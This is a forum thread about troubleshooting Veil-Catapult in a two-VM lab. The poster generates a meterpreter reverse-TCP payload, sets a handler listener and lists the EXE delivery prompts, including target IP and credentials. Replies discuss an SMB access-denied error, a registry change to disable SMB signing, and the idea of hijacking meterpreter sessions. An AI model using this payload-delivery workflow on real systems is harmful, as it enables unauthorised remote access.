Veil-Catapult : EXE transfer

[kikimonste]

Hi ,

I'm new to hak5 furums ,

I've been having an issue with Veil-Catapult , never seem to work .

Here is what i've done :

Bridged 2 VMs :

One running Kali Linux IP : 192.168.0.101 ,

One running good old Win7 SP1 IP : 192.168.0.102.

Then , start terminal generate payload with veil-evasion using c/meterpreter/rev_tcp

feed Veil-Catapult my payload in EXE delivery mode :

Veil-Catapult

EXE DELIVERY

Enter path to payload : /usr/share/veil-evasion/compiled/load.exe [enter]

Enter target IP : 192.168.0.102 [enter]

Enter target [domain/]username : M-101100 [enter]

Enter target password : 00000 [enter]

Press Enter to lauch : [enter]

Error : Timeout : bad credential.

Exe Delivered Sucessfuly.

Right before that , setted msfconsole with multi/handler using port 4444 listning on ANY (0.0.0.0:4444)

Setting in veil-evasion for payload generation were : LPORT : 4444 LHOST : 192.168.0.101

Now did anyone get this type of error ?

If I did something wrong how do I fix it ?

Thanks a lot guys .

Rick.

[kikimonste]

Bump , Username/password pairs are OK . Just verified again , SMB is started on target win7 box.

[kikimonste]

Here is the error.

Veil-Catapult: payload delivery system | [Version]: 1.1
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @veilframework
=========================================================================

Exception: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Error on 192.168.89.113 with credentials target:00000

[*] Payload upload and triggering complete!

[cooper]

A quick google on that access denied error resulted in a post somewhere that says you should enter the registry of your attacking machine and find the key "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters”. In there you should create the “RequireSecuritySignature” key as a REG_DWORD and set it to a value of 0.

I've never used any of this, so no guarantees on what it does or if it helps. The actual registry key is described by Microsoft here and I HIGHLY recommend you read it before you kill your machine and come back blaming me for it.

[kikimonste]

Hi , said key was already set to = 0. Anyone encounter same error ?

[vailixi]

Right before that , setted msfconsole with multi/handler using port 4444 listning on ANY (0.0.0.0:4444)

Setting in veil-evasion for payload generation were : LPORT : 4444 LHOST : 192.168.0.101

Running services on port 4444 is going to be a dead giveaway you are a hacker. Just sayin'. If I was scanning the network and saw 4444 I would think metasploit.

That brings up an interesting question. Is there a reliable way to hijack a meterpreter session? Or maybe use ARP spoofing to make the target machine think you are the intruder machine and effectively MITM the session. It would sure save me a lot of work. Just intercept the attackers commands. Nullify them. Issue your own commands.